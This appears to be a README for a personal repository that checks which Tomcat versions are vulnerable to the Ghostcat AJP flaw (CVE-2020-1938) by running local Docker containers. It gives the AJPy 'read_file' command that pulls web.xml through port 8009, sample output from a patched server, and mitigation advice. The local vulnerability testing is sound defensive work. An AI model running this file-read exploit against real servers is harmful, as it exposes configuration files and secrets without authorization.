A new exploit called Ghostcat has been found CVE-2020-1938, see the articles on snyk and tenable for details and analysis of the exploit itself.
In my case, I wanted to verify which Tomcat servers are exploitable and if so how does it manifest itself. So this experiment is to check Tomcat 7, 8 and 9.
- docker
- python
- git
TODO: How to verify a Tomcat 7 is vulnerable?
Rather than testing exploits on live servers, I am using existing builds of Tomcat to perform my experiment using AJPy which crafts AJP requests in order to communicate with AJP connectors.
git clone --recurse-submodules git@github.com:shaunmclernon/ghostcat-verification.git
cd ghostcat-verification/AJPy
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
If it returns the web.xml then this version of Tomcat is vulnerable to the exploit.
If we try the same test using the latest version of Tomcat 8.5 we can see it is not vulnerable to this particular error.
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
In this case, we should get a python error, which actually means the server is not vulnerable;
Traceback (most recent call last):
File "tomcat.py", line 377, in <module>
hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
...
...
struct.error: unpack requires a buffer of 5 bytes
TODO: How to verify a Tomcat 9 is vulnerable?
TODO: How to verify a springboot service is vulnerable?
Obviously if vulnerable (regardless of the version), you should consider upgrading the to the patched versions. One other option is block access to the AJP port.
Start the same Tomcat version but do not expose the AJP port 8009.
docker run --name tomcat --rm -d -p 8080:8080 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
In this case, we can see that it will fail to exploit the server.
I am not a security professional and this repo was built for my learning purposes, it is not intended to be used for malicious purposes.